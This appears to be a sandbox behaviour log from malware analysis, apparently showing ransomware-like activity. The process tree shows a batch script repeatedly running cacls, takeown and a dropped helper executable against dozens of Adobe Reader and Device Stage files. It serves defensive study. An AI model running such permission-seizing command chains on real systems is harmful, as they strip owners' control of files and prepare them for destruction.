C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "review_browser.gif" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "review_browser.gif" -nobanner4⤵PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "tl.gif" -nobanner3⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "tl.gif" -nobanner4⤵PID:1592
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "Identity-V" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "Identity-V" -nobanner4⤵PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵PID:240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:1340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "brt55.ths" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "brt55.ths" -nobanner4⤵PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "superbar.png" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "superbar.png" -nobanner4⤵PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "usa03.hsp" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "usa03.hsp" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:1572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:664
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:1156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:1060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "pmd.cer" -nobanner3⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "pmd.cer" -nobanner4⤵PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:772
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "pdf.gif" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "pdf.gif" -nobanner4⤵PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "server_issue.gif" -nobanner3⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "server_issue.gif" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:892
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:768
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "zx______.pfm" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "zx______.pfm" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "can32.clx" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "can32.clx" -nobanner4⤵PID:1556
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "symbol.txt" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "symbol.txt" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:1004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "device.png" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "device.png" -nobanner4⤵PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2012
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:1004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "tasks.xml" -nobanner3⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "tasks.xml" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:828
-
-
